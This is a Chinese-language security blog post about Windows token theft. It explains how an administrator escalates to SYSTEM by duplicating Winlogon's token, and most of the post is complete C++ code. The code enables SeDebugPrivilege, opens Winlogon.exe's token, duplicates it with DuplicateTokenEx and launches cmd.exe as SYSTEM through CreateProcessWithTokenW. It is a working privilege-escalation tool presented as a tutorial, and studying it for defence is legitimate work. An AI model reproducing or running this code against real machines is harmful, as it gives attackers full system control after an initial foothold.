idiotc4t's blog
搜索文档…
GitBook 提供支持
通过复制Token提权到SYSTEM
在windows系统中使用一个较高细粒度的Token来区分和管理权限,我们通常说的system权限administrator权限本质上是令牌的完整性和特权不同,通过细粒度较高的特权进行区分。
在本文中,不会对令牌机制进行详细的剖析,只需要知道它本质上是一个内核对象即可,详细的内容会在以后的内核操作文章中详细讲解。
    下图分别是medium完整性令牌和high完整性令牌。

提权流程

    1.
    打开system权限进程
    2.
    复制system权限进程Token
    3.
    使用复制Token打开新进程

代码实现

默认配置的管理员拥有SeDebugPrivilege,该权限用于调试进程,是否拥有直接决定你是否能打开写入调试注入如winlogon,system等进程。
1
#include <windows.h>
2
#include <iostream>
3
#include <Lmcons.h>
4
#include <TlHelp32.h>
5
6
BOOL SePrivTokenrivilege(
7
HANDLE hToken,
8
LPCTSTR lpszPrivilege,
9
BOOL bEnablePrivilege
10
)
11
{
12
LUID luid;
13
14
if (!LookupPrivilegeValue(
15
NULL,
16
lpszPrivilege,
17
&luid))
18
{
19
return FALSE;
20
}
21
22
TOKEN_PRIVILEGES PrivToken;
23
PrivToken.PrivilegeCount = 1;
24
PrivToken.Privileges[0].Luid = luid;
25
if (bEnablePrivilege)
26
PrivToken.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
27
else
28
PrivToken.Privileges[0].Attributes = 0;
29
30
31
if (!AdjustTokenPrivileges(
32
hToken,
33
FALSE,
34
&PrivToken,
35
sizeof(TOKEN_PRIVILEGES),
36
(PTOKEN_PRIVILEGES)NULL,
37
(PDWORD)NULL))
38
{
39
return FALSE;
40
}
41
42
return TRUE;
43
}
44
45
46
DWORD FindProcessPID(const wchar_t* ProcessName) {
47
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
48
PROCESSENTRY32 process = { 0 };
49
process.dwSize = sizeof(process);
50
51
if (Process32First(snapshot, &process)) {
52
do {
53
if (!wcscmp((const wchar_t*)process.szExeFile,(const wchar_t*)ProcessName))
54
break;
55
} while (Process32Next(snapshot, &process));
56
}
57
58
CloseHandle(snapshot);
59
return process.th32ProcessID;
60
}
61
62
int main(int argc, char** argv) {
63
HANDLE hDpToken = NULL;
64
65
66
67
HANDLE hCurrentToken = NULL;
68
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hCurrentToken);
69
SePrivTokenrivilege(hCurrentToken, L"SeDebugPrivilege", TRUE);
70
71
DWORD PID_TO_IMPERSONATE = FindProcessPID(L"Winlogon.exe");
72
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, true, PID_TO_IMPERSONATE);
73
74
75
HANDLE hToken = NULL;
76
BOOL TokenRet = OpenProcessToken(hProcess,
77
TOKEN_DUPLICATE |
78
TOKEN_ASSIGN_PRIMARY |
79
TOKEN_QUERY, &hToken);
80
81
BOOL impersonateUser = ImpersonateLoggedOnUser(hToken);
82
if (GetLastError() == NULL)
83
{
84
RevertToSelf();
85
}
86
87
88
BOOL dpToken = DuplicateTokenEx(hToken,
89
TOKEN_ADJUST_DEFAULT |
90
TOKEN_ADJUST_SESSIONID |
91
TOKEN_QUERY |
92
TOKEN_DUPLICATE |
93
TOKEN_ASSIGN_PRIMARY,
94
NULL,
95
SecurityImpersonation,
96
TokenPrimary,
97
&hDpToken
98
);
99
100
101
STARTUPINFO startupInfo = {0};
102
startupInfo.cb = sizeof(STARTUPINFO);
103
PROCESS_INFORMATION ProcessInfo = {0};
104
105
BOOL Ret = CreateProcessWithTokenW(hDpToken,
106
LOGON_WITH_PROFILE,
107
L"C:\\Windows\\System32\\cmd.exe",
108
NULL, 0, NULL, NULL,
109
&startupInfo,
110
&ProcessInfo);
111
112
113
return TRUE;
114
}
Copied!

LINKS

Microsoft 标识平台访问令牌 - Microsoft identity platform
docsmsft
最近更新 1yr ago